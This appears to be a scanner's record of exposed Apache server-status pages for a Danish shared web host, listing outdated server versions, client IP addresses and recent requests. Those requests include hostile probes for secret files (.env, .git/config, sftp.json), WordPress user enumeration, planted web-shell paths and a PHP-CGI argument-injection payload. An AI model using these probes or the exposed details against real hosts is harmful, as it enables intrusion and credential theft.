66.249.79.237webhotel5.webhosting.dkGET / HTTP/1.0 44-8-0/0/100. 0.08532000.00.000.06 145.239.10.137webhotel5.webhosting.dkGET /composer.php HTTP/1.0 45-8-0/0/50. 0.07532000.00.000.03 145.239.10.137webhotel5.webhosting.dkGET /web_system.php HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3ff948945
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Tuesday, 18-Jun-2024 18:49:44 CEST Restart Time: Tuesday, 18-Jun-2024 06:05:05 CEST Parent Server Generation: 12 Server uptime: 12 hours 44 minutes 39 seconds Total accesses: 49769 - Total Traffic: 43.4 MB CPU Usage: u1.75 s.76 cu0 cs0 - .00547% CPU load 1.08 requests/sec - 991 B/second - 913 B/request 1 requests currently being processed, 35 idle workers _______________________W_____._____.__.......................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-12479230/46/1531_ 0.05300.00.011.20 167.71.175.236webhotel5.webhosting.dkGET /telescope/requests HTTP/1.0 1-12479630/46/1527_ 0.06230.00.010.76 165.227.39.235webhotel5.webhosting.dkGET / HTTP/1.0 2-12479910/45/1495_ 0.06400.00.010.79 167.71.175.236webhotel5.webhosting.dkGET /.git/config HTTP/1.0 3-12479960/45/1520_ 0.08300.00.011.00 167.71.175.236webhotel5.webhosting.dkven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.0 4-12479970/45/1526_ 0.04300.00.010.98 167.71.175.236webhotel5.webhosting.dkGET /config.json HTTP/1.0 5-12480050/45/1526_ 0.06230.00.011.92 167.71.175.236webhotel5.webhosting.dkGET /?rest_route=/wp/v2/users/ HTTP/1.0 6-12480060/45/1521_ 0.06100.00.010.91 165.227.39.235webhotel5.webhosting.dkGET /server HTTP/1.0 7-12479640/46/1515_ 0.06100.00.011.21 165.227.39.235webhotel5.webhosting.dkGET /about HTTP/1.0 8-12479720/45/1518_ 0.07000.00.050.87 165.227.39.235webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 9-12479730/46/1513_ 0.06100.00.012.55 165.227.39.235webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 10-12479740/45/1515_ 0.06811780.00.021.12 167.71.175.236webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 11-12479750/45/1474_ 0.05600.00.021.47 167.71.175.236webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 12-12479790/45/1509_ 0.04600.00.011.52 167.71.175.236webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 13-12479800/45/1511_ 0.06600.00.141.64 167.71.175.236webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 14-12479810/45/1480_ 0.07510.00.011.47 167.71.175.236webhotel5.webhosting.dkGET /server-status HTTP/1.0 15-12480070/45/1512_ 0.06250.00.021.44 165.227.39.235webhotel5.webhosting.dkGET / HTTP/1.0 16-12480080/44/1491_ 0.06835470.00.041.77 209.34.199.106webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 17-12480110/45/1491_ 0.07000.00.050.85 165.227.39.235webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 18-12480120/44/1491_ 0.06840180.00.010.70 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 19-12480130/44/1490_ 0.06815090.00.032.90 167.71.175.236webhotel5.webhosting.dkGET / HTTP/1.0 20-12480140/44/1430_ 0.06700.00.060.81 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 21-12480150/44/1396_ 0.068380.00.040.89 81.19.232.105webhotel5.webhosting.dkHEAD / HTTP/1.0 22-12543160/20/1286_ 0.01100.00.011.20 165.227.39.235webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 23-12566770/8/1272W 0.00000.00.000.70 165.227.39.235webhotel5.webhosting.dkGET /server-status HTTP/1.0 24-12567120/9/1253_ 0.00000.00.000.85 165.227.39.235webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 25-12615530/0/1248_ 0.07800.00.002.30 52.163.230.25webhotel5.webhosting.dkGET /wp-includes/images/smaxx.php HTTP/1.0 26-12479820/45/1268_ 0.06500.00.020.62 167.71.175.236webhotel5.webhosting.dkGET /login.action HTTP/1.0 27-12615560/0/1190_ 0.07800.00.001.01 193.141.60.101webhotel5.webhosting.dkGET /index.php HTTP/1.0 28-12615570/0/1174_ 0.08800.00.000.85 193.141.60.101webhotel5.webhosting.dkGET /makeasmtp.php HTTP/1.0 29-12-0/0/1162. 0.0678300.00.001.17 193.141.60.101webhotel5.webhosting.dkGET /wp-content/cong.php HTTP/1.0 30-12479830/45/1137_ 0.05500.00.021.14 185.211.59.11webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 31-12479840/45/1051_ 0.06500.00.020.66 167.71.175.236webhotel5.webhosting.dkGET /_all_dbs HTTP/1.0 32-12480160/44/838_ 0.07700.00.010.45 167.71.175.236webhotel5.webhosting.dkGET /server HTTP/1.0 33-12480170/44/828_ 0.07700.00.060.45 167.71.175.236webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 34-12480180/44/654_ 0.06700.00.010.45 167.71.175.236webhotel5.webhosting.dkGET /about HTTP/1.0 35-12-0/0/570. 0.07147600.00.000.47 52.163.230.25webhotel5.webhosting.dkGET /images/cloud.php HTTP/1.0 36-12479850/45/515_ 0.06400.00.011.13 167.71.175.236webhotel5.webhosting.dkGET /.DS_Store HTTP/1.0 37-12479860/45/489_ 0.08400.00.030.49 167.71.175.236webhotel5.webhosting.dkGET /.env HTTP/1.0 38-8-0/0/229. 0.071378900.00.000.11 139.59.65.234webhotel5.webhosting.dkGET /wp-admin/includes/tiny.php HTTP/1.0 39-8-0/0/134. 0.001377500.00.000.05 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 40-8-0/0/84. 0.011377500.00.000.17 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 41-8-0/0/84. 0.011377500.00.000.20 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 42-8-0/0/60. 0.011377500.00.000.03 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 43-8-0/0/60. 0.001377500.00.000.03 139.59.65.234webhotel5.webhosting.dkGET /css/about.php HTTP/1.0 44-8-0/0/60. 0.011377500.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 45-2-0/0/47. 0.083537400.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 46-2-0/0/47. 0.073537400.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 47-2-0/0/47. 0.073537400.00.000.03 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 </ SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde31542076d
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Sunday, 16-Jun-2024 13:15:14 CEST Restart Time: Sunday, 16-Jun-2024 04:00:05 CEST Parent Server Generation: 9 Server uptime: 9 hours 15 minutes 8 seconds Total accesses: 34767 - Total Traffic: 40.1 MB CPU Usage: u1.21 s.54 cu0 cs0 - .00525% CPU load 1.04 requests/sec - 1261 B/second - 1208 B/request 1 requests currently being processed, 30 idle workers ______W_______________________..._.............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-9438050/26/1067_ 0.032100.00.010.96 136.244.68.114www.team-otte.dkHEAD /main HTTP/1.0 1-9438080/26/1066_ 0.03000.00.011.99 206.81.24.227webhotel5.webhosting.dkGET /server HTTP/1.0 2-9438090/26/1066_ 0.04000.00.011.42 206.81.24.227webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 3-9438060/26/1066_ 0.03420.00.020.84 85.209.11.117webhotel5.webhosting.dkGET / HTTP/1.0 4-9438030/26/1065_ 0.03000.00.011.61 206.81.24.227webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 5-9438100/26/1063_ 0.03000.00.010.78 206.81.24.227webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 6-9438110/25/1061W 0.03000.00.010.93 206.81.24.227webhotel5.webhosting.dkGET /server-status HTTP/1.0 7-9438040/26/1063_ 0.032100.00.010.90 136.244.68.114www.team-otte.dkHEAD /new HTTP/1.0 8-9438120/25/1060_ 0.02000.00.012.03 127.0.0.1webhotel5.webhosting.dkGET / HTTP/1.0 9-9438130/25/1060_ 0.033730.00.010.84 198.235.24.141webhotel5.webhosting.dkGET / HTTP/1.0 10-9438170/25/1059_ 0.042200.00.011.06 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 11-9438180/25/1058_ 0.032140.00.010.83 136.244.68.114www.team-otte.dkHEAD / HTTP/1.0 12-9438190/25/1054_ 0.032110.00.001.43 136.244.68.114www.team-otte.dkHEAD /wp HTTP/1.0 13-9438200/25/1058_ 0.032100.00.001.36 136.244.68.114www.team-otte.dkHEAD /bc HTTP/1.0 14-9438210/25/1055_ 0.032100.00.001.03 136.244.68.114www.team-otte.dkHEAD /bk HTTP/1.0 15-9438630/25/1056_ 0.032100.00.000.71 136.244.68.114www.team-otte.dkHEAD /backup HTTP/1.0 16-9439600/25/1059_ 0.032140.00.011.71 136.244.68.114www.team-otte.dkHEAD /home HTTP/1.0 17-9440090/25/1053_ 0.0315990.00.071.04 216.244.66.241www.valloe.orgGET /pictures/ssr0840.jpg HTTP/1.0 18-9440300/25/1052_ 0.03900.00.010.80 87.93.156.147webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 19-9438070/26/1020_ 0.04000.00.021.08 206.81.24.227webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 20-9440530/25/1010_ 0.04030.00.011.57 206.81.24.227webhotel5.webhosting.dkGET / HTTP/1.0 21-9440860/25/1010_ 0.04030.00.010.89 206.81.24.227webhotel5.webhosting.dkGET / HTTP/1.0 22-9441010/25/995_ 0.03000.00.010.90 206.81.24.227webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 23-9438020/30/963_ 0.042100.00.010.61 136.244.68.114www.team-otte.dkHEAD /old HTTP/1.0 24-9438140/25/942_ 0.0321310.00.010.84 136.244.68.114www.team-otte.dkHEAD /wordpress HTTP/1.0 25-9438150/25/941_ 0.042600.00.011.21 128.199.91.22webhotel5.webhosting.dkGET /.env HTTP/1.0 26-9441320/25/939_ 0.03000.00.011.04 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 27-9441720/25/893_ 0.04000.00.010.92 206.81.24.227webhotel5.webhosting.dkGET /about HTTP/1.0 28-9442330/24/880_ 0.043730.00.010.91 198.235.24.141webhotel5.webhosting.dkGET / HTTP/1.0 29-9483700/9/787_ 0.011300.00.001.19 40.77.167.7webhotel5.webhosting.dkst&publicationName=temp&issueName=Issue_1_2010&page=66 HTTP/1.0 30-8-0/0/800. 0.0894610.00.000.79 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 31-8-0/0/670. 0.0895000.00.000.69 81.170.148.229webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 32-8-0/0/635. 0.0894700.00.002.27 91.92.243.107webhotel5.webhosting.dkGET /wp-admin/network/about.php HTTP/1.0 33-9438160/25/623_ 0.042500.00.010.83 81.19.232.105webhotel5.webhosting.dkGET /.env HTTP/1.0 34-8-0/0/412. 0.05128600.00.000.60 152.42.236.27webhotel5.webhosting.dkGET /wp-includes/images/about.php HTTP/1.0 35-8-0/0/362. 0.0893550.00.000.80 198.235.24.146webhotel5.webhosting.dkGET / HTTP/1.0 36-7-0/0/235. 0.07630280.00.000.29 150.31.16.215www.lillekrabbe.dkGET /lab/layout/addy.gif HTTP/1.0 37-7-0/0/187. 0.06630240.00.000.26 150.31.16.215www.lillekrabbe.dkGET /lab/dollmaker/shoes.gif HTTP/1.0 38-7-0/0/111. 0.066302290.00.000.04 150.31.16.215www.lillekrabbe.dkGET /lab/banners/own/dollmakerbutton.gif HTTP/1.0 39-7-0/0/111. 0.06630230.00.000.03 150.31.16.215www.lillekrabbe.dkGET /lab/dollmaker/choker2.gif HTTP/1.0 40-3-0/0/50. 0.071909820.00.000.01 52.16.33.189webhotel5.webhosting.dkGET / HTTP/1.0 41-3-0/0/50. 0.061909320.00.000.01 66.249.65.109www.discteknik.dkGET /Forside/forside%20m%20DiscSchnabel.htm HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3df9b2d32
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Wednesday, 12-Jun-2024 15:10:47 CEST Restart Time: Wednesday, 12-Jun-2024 06:05:05 CEST Parent Server Generation: 9 Server uptime: 9 hours 5 minutes 42 seconds Total accesses: 50403 - Total Traffic: 51.3 MB CPU Usage: u.74 s.31 cu0 cs0 - .00321% CPU load 1.54 requests/sec - 1641 B/second - 1066 B/request 1 requests currently being processed, 30 idle workers ________________________W______................................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-994360/17/1509_ 0.02100.00.020.93 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 1-994370/17/1505_ 0.03100.00.001.35 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 2-994380/17/1507_ 0.04100.00.001.72 206.189.225.181webhotel5.webhosting.dkGET /.git/config HTTP/1.0 3-994390/17/1489_ 0.02000.00.011.36 206.189.225.181webhotel5.webhosting.dkven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.0 4-994400/17/1504_ 0.02000.00.061.73 206.189.225.181webhotel5.webhosting.dkGET /config.json HTTP/1.0 5-994410/17/1502_ 0.02020.00.013.60 46.101.111.185webhotel5.webhosting.dkGET / HTTP/1.0 6-994420/17/1502_ 0.03030.00.011.89 46.101.111.185webhotel5.webhosting.dkGET / HTTP/1.0 7-994430/17/1499_ 0.03000.00.000.83 46.101.111.185webhotel5.webhosting.dkGET /server HTTP/1.0 8-994440/17/1498_ 0.03000.00.012.91 46.101.111.185webhotel5.webhosting.dkGET /about HTTP/1.0 9-994450/17/1498_ 0.02000.00.010.93 46.101.111.185webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 10-994460/17/1498_ 0.02000.00.010.94 46.101.111.185webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 11-994470/17/1498_ 0.03000.00.001.86 46.101.111.185webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 12-994710/16/1452_ 0.02430.00.001.93 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 13-994860/16/1431_ 0.02300.00.001.34 206.189.225.181webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 14-994890/16/1498_ 0.02300.00.011.64 206.189.225.181webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 15-994900/16/1439_ 0.02280.00.011.43 206.189.225.181webhotel5.webhosting.dkGET /server-status HTTP/1.0 16-994950/16/1419_ 0.03200.00.021.81 206.189.225.181webhotel5.webhosting.dkGET /login.action HTTP/1.0 17-994990/16/1412_ 0.01200.00.000.84 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 18-995030/16/1400_ 0.02200.00.010.79 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 19-995200/16/1380_ 0.03200.00.010.97 206.189.225.181webhotel5.webhosting.dkGET /_all_dbs HTTP/1.0 20-995680/16/1385_ 0.01200.00.001.30 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 21-994280/23/1403_ 0.03000.00.000.97 46.101.111.185webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 22-994290/18/1375_ 0.02000.00.022.41 206.189.225.181webhotel5.webhosting.dkGET /telescope/requests HTTP/1.0 23-994300/17/1357_ 0.03300.00.001.16 206.189.225.181webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 24-994310/17/1322W 0.02000.00.000.79 46.101.111.185webhotel5.webhosting.dkGET /server-status HTTP/1.0 25-994320/17/1311_ 0.02400.00.002.91 206.189.225.181webhotel5.webhosting.dkGET /about HTTP/1.0 26-994330/17/1307_ 0.02100.00.000.88 206.189.225.181webhotel5.webhosting.dkGET /.DS_Store HTTP/1.0 27-994340/17/1252_ 0.03100.00.010.89 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 28-994350/17/1210_ 0.03100.00.010.93 206.189.225.181webhotel5.webhosting.dkGET /.env HTTP/1.0 29-995730/16/1220_ 0.01200.00.001.74 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 30-9113160/13/1078_ 0.02200.00.010.97 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 31-8-0/0/975. 0.0063900.00.001.27 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 32-8-0/0/963. 0.0063900.00.000.70 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 33-8-0/0/807. 0.0875800.00.000.68 20.243.235.235webhotel5.webhosting.dkGET //wp-blog.php HTTP/1.0 34-8-0/0/716. 0.0776000.00.000.85 20.243.235.235webhotel5.webhosting.dkGET //wp-content/shell20211028.php HTTP/1.0 35-8-0/0/580. 0.0063900.00.000.39 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 36-8-0/0/448. 0.0063900.00.000.17 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 37-8-0/0/362. 0.0063900.00.000.40 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 38-8-0/0/246. 0.0063900.00.000.11 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 39-8-0/0/245. 0.0063900.00.000.15 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 40-8-0/0/245. 0.0063900.00.000.20 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 41-8-0/0/245. 0.0063900.00.000.08 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 42-8-0/0/244. 0.0063900.00.000.08 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 43-8-0/0/245. 0.0063900.00.000.29 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 44-8-0/0/145. 0.01639100.00.000.06 94.247.172.129webhotel5.webhosting.dkGET / HTTP/1.0 45-6-0/0/127. 0.02783400.00.000.05 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 46-5-0/0/100. 0.071189380.00.000.04 176.222.0.228www.lillekrabbe.dkGET /lab/dollmaker/afro1red.gif HTTP/1.0 47-5-0/0/50. 0.081189320.00.000.03 176.222.0.228www.lillekrabbe.dkGET /lab/dollmaker/afro1brown.gif HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde32b04ec72
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Monday, 10-Jun-2024 18:28:40 CEST Restart Time: Monday, 10-Jun-2024 06:05:04 CEST Parent Server Generation: 12 Server uptime: 12 hours 23 minutes 36 seconds Total accesses: 49823 - Total Traffic: 44.3 MB CPU Usage: u1.54 s.68 cu0 cs0 - .00498% CPU load 1.12 requests/sec - 1040 B/second - 931 B/request 1 requests currently being processed, 31 idle workers ___________W____________________................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-1251900/34/1512_ 0.051000.00.011.14 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 1-1251910/31/1460_ 0.051800.00.241.75 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 2-1251920/31/1507_ 0.052500.00.190.73 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 3-1251930/32/1512_ 0.04000.00.191.07 207.154.212.47webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 4-1251940/32/1459_ 0.061200.00.291.24 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 5-1251950/31/1506_ 0.043020.00.102.10 3.88.158.225webhotel5.webhosting.dkGET / HTTP/1.0 6-1251960/31/1446_ 0.053230.00.120.99 54.167.69.86webhotel5.webhosting.dkGET / HTTP/1.0 7-1251970/31/1503_ 0.041820.00.031.02 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 8-1251980/32/1501_ 0.05000.00.031.42 207.154.212.47webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 9-1251990/31/1500_ 0.052920.00.211.53 54.167.69.86webhotel5.webhosting.dkGET / HTTP/1.0 10-1252000/31/1498_ 0.043000.00.022.59 217.113.194.43webhotel5.webhosting.dkewer&publicationName=tfs&issueName=Issue2008_22&page=8 HTTP/1.0 11-1252010/31/1499W 0.05000.00.152.86 207.154.212.47webhotel5.webhosting.dkGET /server-status HTTP/1.0 12-1252020/31/1498_ 0.0515440.00.081.72 111.207.155.211webhotel5.webhosting.dkGET / HTTP/1.0 13-1252070/31/1446_ 0.062600.00.271.64 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 14-1252030/32/1494_ 0.04000.00.021.23 207.154.212.47webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 15-1252050/31/1495_ 0.072700.00.182.22 78.168.252.236webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 16-1252040/30/1443_ 0.043400.00.071.04 185.211.58.226webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 17-1252080/31/1493_ 0.053220.00.031.09 3.88.158.225webhotel5.webhosting.dkGET / HTTP/1.0 18-1252090/31/1442_ 0.042200.00.180.93 217.113.194.37webhotel5.webhosting.dkwer&publicationName=tfs&issueName=Issue2008_22&page=17 HTTP/1.0 19-1252100/31/1441_ 0.051400.00.010.94 217.113.194.43webhotel5.webhosting.dkwer&publicationName=tfs&issueName=Issue2008_22&page=13 HTTP/1.0 20-1252310/31/1362_ 0.05800.00.050.70 81.19.232.105webhotel5.webhosting.dkhttps://xnxxcom.club/se/?query=rpandabearsworld%20porn HTTP/1.0 21-1252580/31/1399_ 0.05620.00.021.32 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 22-1252840/31/1342_ 0.03600.00.020.73 217.113.194.46webhotel5.webhosting.dkwer&publicationName=tfs&issueName=Issue2008_22&page=10 HTTP/1.0 23-1253060/31/1297_ 0.06100.00.010.85 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 24-1253210/31/1289_ 0.05370.00.191.27 66.249.69.5www.mercasol-frv.dkGET / HTTP/1.0 25-1253230/31/1244_ 0.05020.00.121.63 207.154.212.47webhotel5.webhosting.dkGET / HTTP/1.0 26-1253260/31/1293_ 0.04020.00.181.03 207.154.212.47webhotel5.webhosting.dkGET / HTTP/1.0 27-1253270/31/1208_ 0.05000.00.130.80 207.154.212.47webhotel5.webhosting.dkGET /server HTTP/1.0 28-1253280/31/1144_ 0.05000.00.230.92 207.154.212.47webhotel5.webhosting.dkGET /about HTTP/1.0 29-1253340/31/1163_ 0.04000.00.011.17 207.154.212.47webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 30-1267570/30/1194_ 0.054120.00.040.65 66.249.69.5www.mercasol-frv.dkGET /robots.txt HTTP/1.0 31-12102510/20/1107_ 0.031900.00.050.73 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 32-10-0/0/942. 0.09631100.00.000.53 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 33-10-0/0/929. 0.10630400.00.000.71 216.244.66.240webhotel5.webhosting.dkGET /Soeg.aspx?ID=17 HTTP/1.0 34-10-0/0/862. 0.07630800.00.000.49 78.168.252.236webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 35-11-0/0/687. 0.07321800.00.000.58 91.92.251.88webhotel5.webhosting.dkGET /wp-admin/install.php HTTP/1.0 36-10-0/0/562. 0.03531000.00.000.27 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 37-10-0/0/391. 0.05531000.00.000.19 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 38-9-0/0/303. 0.061020240.00.000.10 87.49.43.6www.discteknik.dkGET /discteknik%20logo.htm HTTP/1.0 39-6-0/0/150. 0.062156300.00.000.09 193.176.211.203webhotel5.webhosting.dkGET /wp-includes/embedd.php HTTP/1.0 40-6-0/0/100. 0.052156300.00.000.03 193.176.211.203webhotel5.webhosting.dkGET /wp-includes/random_compat/chosen.php HTTP/1.0 41-6-0/0/100. 0.062156200.00.000.06 193.176.211.203webhotel5.webhosting.dkGET /wp-includes/Requests/Transport/reverse.php HTTP/1.0 42-6-0/0/100. 0.062155600.00.000.13 193.176.211.203webhotel5.webhosting.dkGET /assets/images/menu.php HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection 